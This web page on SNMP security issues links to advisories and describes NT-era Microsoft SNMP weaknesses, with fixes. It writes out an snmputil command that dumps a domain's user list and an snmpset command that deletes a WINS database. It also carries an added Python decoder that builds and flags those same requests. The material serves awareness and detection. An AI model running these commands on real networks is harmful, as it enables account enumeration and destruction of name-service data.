WTCS.ORG

Things you should know




SNMP Security Issues

As with any protocol, SNMP, if properly managed, gives you the ability to effectively control and monitor your network devices. Left unsecured, that same power can easily be misused.

This page attempts to inform you of some of the security issues surrounding SNMP.

The bottom line:  Keep your SNMP inaccessible from the Internet (block those ports), and know your internal risks!


General Information

First and Foremost - Check here for the latest on general SNMP vulnerabilities

CERT Advisory (CA-2002-03) (CERT)

Understanding the Risks of SNMP Vulnerabilities (Lucent)

ANALYSIS: Dealing With New SNMP Vulnerabilities (Internet Week - Tom Smith)

Scanning for SNMP Vulnerabilities (The Register - Thomas C. Greene)

Read Community Guessable (SAINT Corp)

SNMP Vulnerabilities (SANS)


Microsoft Specific

Well, it seems that Microsoft's implementation of SNMP has a couple of security holes.

Snmp.exe Leaks Memory When Querying Printer Objects in Lmmib2.mib If Spooler Is Stopped.  More information here.

Microsoft Windows 2000 SNMP Vulnerabilities (SANS)

Windows 2000 SNMP Vulnerability Alert (Microsoft)

SNMP Security on Windows NT (NAI)

Domain User list dump (example)

WINS database deletion (example)


Domain exploit - demonstrates the ability, via SNMP, to dump a list of all usernames in an NT domain (if the target box is a domain controller) or on an NT Server. Try this:
    snmputil walk <hostname> <community> .1.3.6.1.4.1.77.1.2.25
where <hostname> is a domain controller or server and <community> is a community string the host accepts.

FIX: OK, so here's the answer to this one. Start the registry editor (Start/Run/regedt32), navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents and delete the entry for the LanManager MIB extension agent (the one highlighted in the screenshot below). The LanManager MIB extension DLL (lmmib2.dll) will then not load, and the user account names, etc. will no longer be accessible. Too easy, huh?
[Screenshot: registry editor showing the LANMAN MIB extension agent entry]
(You could also just delete %systemroot%\system32\lmmib2.dll, but you would probably see an error in the event log when it is not found.)


WINS exploit - demonstrates the ability, via SNMP, to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large-scale WINS architecture, you can understand the implications of this.

Knowledge of the SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with N commands (N = number of WINS servers). This is permitted by the extensive "cmd" set implemented in the WINS extension agent, specifically:

cmdDeleteWins OBJECT-TYPE
    SYNTAX IpAddress
    ACCESS read-write
    STATUS mandatory
    DESCRIPTION "This variable when set will cause all information pertaining to a WINS
                 (data records, context information to be deleted from the local WINS.
                 Use this only when owner-address mapping table is getting to near capacity.
                 NOTE: deletion of all information pertaining to the managed WINS is not
                 permitted"
    ::= { cmd 3 }

Since the SNMP toolset shipped with NT will not issue SNMP set requests, the sample exploit was done using the CMU SNMP development kit under Unix. The command "snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" successfully deleted an entire WINS database.

FIX: Apply Service Pack 4 or above (on NT4).
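As an added example (not code from the WTCS.ORG page), the following Python decoder takes a raw SNMPv1 message, as carried in a UDP/161 datagram, and flags the two requests described above: a SetRequest against the WINS cmdDeleteWins object (.1.3.6.1.4.1.311.1.2.5.3) and a walk (GetNextRequest) of the LanManager MIB user list (.1.3.6.1.4.1.77.1.2.25). The sample messages are constructed inline with a minimal BER encoder so that the bytes are exact; the request-ids, the descriptions in the WATCHED table and the benign sysName request are assumptions for illustration.

```python
"""Decode SNMPv1 (BER) messages and flag the requests discussed on this page.
Added example for detection, not code from the WTCS.ORG page. Samples are
constructed with a tiny BER encoder; in practice feed captured UDP/161 payloads."""

def _ber_len(n):
    """BER length: short form below 128, long form otherwise."""
    if n < 128:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, payload):
    """One tag-length-value element."""
    return bytes([tag]) + _ber_len(len(payload)) + payload

def enc_int(v):
    """INTEGER, two's complement, minimal length."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def enc_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed, the rest base-128 encoded."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))   # high-order groups first, continuation bit set
    return tlv(0x06, bytes(out))

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA3: "SetRequest"}

def snmpv1_message(community, pdu_tag, request_id, varbinds):
    """SNMPv1 Message ::= SEQUENCE { version 0, community, PDU };
    varbinds is a list of (dotted OID, encoded value) pairs."""
    vbl = tlv(0x30, b"".join(tlv(0x30, enc_oid(o) + v) for o, v in varbinds))
    pdu = tlv(pdu_tag, enc_int(request_id) + enc_int(0) + enc_int(0) + vbl)
    return tlv(0x30, enc_int(0) + tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos):
    """Return (tag, payload, next_pos) for the element starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                      # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def dec_oid(payload):
    """Inverse of enc_oid, applied to the payload of an OID element."""
    arcs, val = [payload[0] // 40, payload[0] % 40], 0
    for b in payload[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return "." + ".".join(map(str, arcs))

def parse_snmpv1(buf):
    """Return version, community, PDU type and the OIDs in the varbind list."""
    tag, msg, _ = _read_tlv(buf, 0)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE")
    _, ver, p = _read_tlv(msg, 0)
    _, comm, p = _read_tlv(msg, p)
    pdu_tag, pdu, _ = _read_tlv(msg, p)
    q = 0
    for _ in range(3):                 # skip request-id, error-status, error-index
        _, _, q = _read_tlv(pdu, q)
    _, vbl, _ = _read_tlv(pdu, q)
    oids, q = [], 0
    while q < len(vbl):
        _, vb, q = _read_tlv(vbl, q)
        _, oid, _ = _read_tlv(vb, 0)   # value after the OID is not needed here
        oids.append(dec_oid(oid))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, "0x%02x" % pdu_tag), "oids": oids}

# OID prefixes from this page: the LanManager user list and the WINS delete command.
WATCHED = {".1.3.6.1.4.1.77.1.2.25": "LanManager MIB user list (lmmib2.dll)",
           ".1.3.6.1.4.1.311.1.2.5.3": "WINS cmdDeleteWins"}

def assess(buf):
    """Parse one message and return (decoded message, list of findings)."""
    m = parse_snmpv1(buf)
    findings = ["write request with community %r" % m["community"]] if m["pdu"] == "SetRequest" else []
    for oid in m["oids"]:
        for prefix, what in WATCHED.items():
            if oid == prefix or oid.startswith(prefix + "."):
                findings.append("%s against %s" % (m["pdu"], what))
    return m, findings

# Constructed samples: addresses as on the page, request-ids arbitrary, NULL (0x05) values for reads.
WINS_DELETE = snmpv1_message("public", 0xA3, 1, [(".1.3.6.1.4.1.311.1.2.5.3.0", tlv(0x40, bytes([192, 178, 16, 2])))])
USER_WALK = snmpv1_message("public", 0xA1, 2, [(".1.3.6.1.4.1.77.1.2.25", tlv(0x05, b""))])
SYS_NAME = snmpv1_message("public", 0xA0, 3, [(".1.3.6.1.2.1.1.5.0", tlv(0x05, b""))])

if __name__ == "__main__":
    for name, pkt in (("WINS_DELETE", WINS_DELETE), ("USER_WALK", USER_WALK), ("SYS_NAME", SYS_NAME)):
        m, f = assess(pkt)
        print(name, m["pdu"], m["oids"], f or "ok")
```

Any SetRequest is reported regardless of OID, since the page's point is that write access with a known community string is the whole problem; the OID table only adds the two objects discussed here. Run over the payloads of all UDP/161 traffic entering a site, this is also a quick check that the "block those ports" advice above actually holds.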


Monitoring Tips and Techniques

Using COM to add PERFMON support to your apps

How to Manage and Monitor Exchange Server


